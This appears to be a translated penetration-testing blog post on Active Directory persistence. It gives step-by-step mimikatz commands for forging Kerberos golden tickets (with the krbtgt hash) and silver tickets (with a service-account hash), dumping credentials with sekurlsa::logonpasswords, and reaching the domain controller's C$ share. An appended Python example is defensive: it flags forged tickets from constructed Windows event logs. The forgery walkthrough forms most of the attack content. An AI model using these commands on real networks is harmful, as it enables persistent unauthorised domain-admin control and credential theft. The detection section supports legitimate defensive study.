Foreword
Once we have obtained a domain account password, we need a way to keep the domain controller privileges we have gained even if that password is later changed.
For how to obtain the domain controller account password, see the linked post.
Domain authentication process (Kerberos tickets)
1. The client first authenticates to the AS (Authentication Server) with its password; the AS returns a TGT.
2. The client presents the TGT to the TGS (Ticket Granting Server); the TGS returns an ST (service ticket).
3. The client uses the ST to access the corresponding service.
Domain persistence - Golden ticket
Introduction
MS14-068 works by forging the domain admin's TGT, whereas a golden ticket forges a ticket as the krbtgt user. krbtgt is the domain account used to issue tickets to domain users, so with its key you can forge a ticket for any user in the domain.
Prerequisite
The MS14-068 ticket forgery has already succeeded.
Procedure
1. Get the domain name: the domain portion shown by whoami, with the suffix (e.g. .com) appended.
2. Get the domain SID (a normal user's SID with the final hyphen-separated field, the user's RID, typically the last four digits, removed):
whoami /all
3. Get the NTLM password hash (or AES-256 key) of the domain's KRBTGT account.
See the section on exporting domain hashes in the MS14-068 ticket forgery post (linked).
4. Clear all existing tickets:
klist purge
5. Use mimikatz to forge a ticket for the specified user and inject it into memory:
kerberos::golden /admin:<username to forge> /domain:<domain name> /sid:<domain SID> /krbtgt:<krbtgt NTLM hash> /ptt
6. Access the domain controller directly over the network:
dir \\dc\c$
Domain persistence - Silver ticket
Introduction
A silver ticket works on a different principle from MS14-068 and the golden ticket: those forge the TGT (ticket-granting ticket), while a silver ticket forges the ST (service ticket). The advantage is that the forged ticket never passes through the KDC, so it is stealthier; the drawback is that it only works for the specific service it targets, such as cifs (file sharing), mssql, winrm (Windows Remote Management), dns, etc.
Prerequisite
The MS14-068 ticket forgery has already succeeded.
Usage
1. Get the domain name: the domain portion shown by whoami, with the suffix (e.g. .com) appended.
2. Get the domain SID (a normal user's SID with the final hyphen-separated field, the user's RID, typically the last four digits, removed):
whoami /all
3. Get the FQDN of the target server:
net time /domain   (returns the domain controller name)
4. For the cifs file-sharing service, obtain the NTLM hash of the service account (the domain controller's machine account, <DC name>$). Starting from the MS14-068 access, dump credentials with mimikatz:
mimikatz.exe privilege::debug sekurlsa::logonpasswords exit > 2.txt
5. Choose the username to impersonate:
net user /domain
6. Clear all existing tickets:
klist purge
7. Use mimikatz to forge a ticket for the specified user and inject it into memory:
kerberos::golden /domain:<domain name> /sid:<domain SID> /target:<full DC name> /service:cifs /rc4:<service account NTLM hash> /user:<username> /ptt
8. Access the domain controller directly over the network:
dir \\dc\c$
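The golden and silver tickets above differ in which issuance step the KDC never sees (no TGT issued for a golden ticket, no service ticket issued for a silver ticket). The following added example, not part of the original post, turns that difference into a detection heuristic over constructed Windows Security-log records (event IDs 4768 = TGT issued, 4769 = service ticket issued, 4624 = logon; the field names and the 10-hour default TGT lifetime window are assumptions).

```python
from datetime import datetime, timedelta

# Constructed sample events (not from the original page): a minimal view of the
# Security-log fields relevant to Kerberos ticket issuance.
#   4768 = TGT issued by the KDC, 4769 = service ticket issued by the KDC,
#   4624 = logon on the target host (assumed LogonType 3 / Kerberos)
EVENTS = [
    {"id": 4768, "t": "2024-05-01T08:00:00", "user": "alice", "src": "10.0.0.5", "host": "DC01"},
    {"id": 4769, "t": "2024-05-01T08:00:02", "user": "alice", "src": "10.0.0.5", "host": "DC01", "svc": "cifs/FS01"},
    {"id": 4624, "t": "2024-05-01T08:00:03", "user": "alice", "src": "10.0.0.5", "host": "FS01"},
    # golden-ticket pattern: service ticket requested, but the KDC never issued a TGT
    {"id": 4769, "t": "2024-05-01T09:30:00", "user": "bob", "src": "10.0.0.9", "host": "DC01", "svc": "cifs/DC01"},
    # silver-ticket pattern: Kerberos logon on FS01, but the KDC never issued a service ticket
    {"id": 4624, "t": "2024-05-01T10:15:00", "user": "carol", "src": "10.0.0.7", "host": "FS01"},
]


def _ts(s):
    return datetime.fromisoformat(s)


def find_forged_ticket_indicators(events, window=timedelta(hours=10)):
    """Return (kind, user, src, time) for tickets the KDC has no record of issuing.
    A TGT lives at most `window` (10h by default), so a 4769 should be preceded by
    a 4768 for the same user/source, and a Kerberos 4624 by a 4769."""
    tgts = [e for e in events if e["id"] == 4768]
    sts = [e for e in events if e["id"] == 4769]

    def issued(pool, e):
        return any(p["user"] == e["user"] and p["src"] == e["src"]
                   and timedelta(0) <= _ts(e["t"]) - _ts(p["t"]) <= window
                   for p in pool)

    hits = []
    for e in events:
        if e["id"] == 4769 and not issued(tgts, e):
            hits.append(("possible golden ticket", e["user"], e["src"], e["t"]))
        if e["id"] == 4624 and not issued(sts, e):
            hits.append(("possible silver ticket", e["user"], e["src"], e["t"]))
    return hits


if __name__ == "__main__":
    for hit in find_forged_ticket_indicators(EVENTS):
        print(*hit)
```

The heuristic needs logs from every DC in the domain (a TGT issued by one DC and a service ticket by another is legitimate) and only applies to 4624 records with Kerberos as the authentication package, so treat hits as leads to correlate rather than verdicts.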